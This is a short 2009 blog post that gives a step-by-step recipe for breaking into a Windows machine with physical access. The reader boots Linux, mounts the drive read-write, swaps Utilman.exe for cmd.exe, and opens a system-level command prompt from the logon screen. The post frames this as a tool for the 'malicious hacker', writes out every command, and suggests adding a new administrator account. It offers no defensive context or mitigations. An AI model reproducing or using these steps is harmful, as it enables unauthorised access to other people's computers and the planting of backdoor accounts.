Monday, November 23, 2009

Physical access to a computer == COMPLETE PWNGE

Having physical access to a computer in the year 2000s is great, aint it? Well for a malicious hacker, having physical access to someone elses computer is not only great but also guarantees him unauthorized access into the Windows system and doing so isnt quite the task either.

Check out the cool video on how quick and easy the task of breaking into a Windows system wherever physical access to the machine is present.

Offensive security link

Quick notes:
  1. Load up any linix OS
  2. Mount the windows drive in a rw state: "mount -t ntfs-3g /dev/sda1 /mnt/sda1"
  3. Navigate to the Windows/System32 folder: "cd /mnt/sda1/Windows/System32"
  4. Rename Utilman.exe : "mv Utilman.exe Utilman.bak"
  5. Copy cmd.exe to a the name of Utilman.exe: "cp cmd.exe Utilman.exe"
  6. Reboot Comp: "reboot"
  7. When on the logon screen hold down the 'windows key' and 'U' and you should be presented with a command prompt with system priviledges. From here on you might wanna create a new user and add him to the administrators group

No comments:

Post a Comment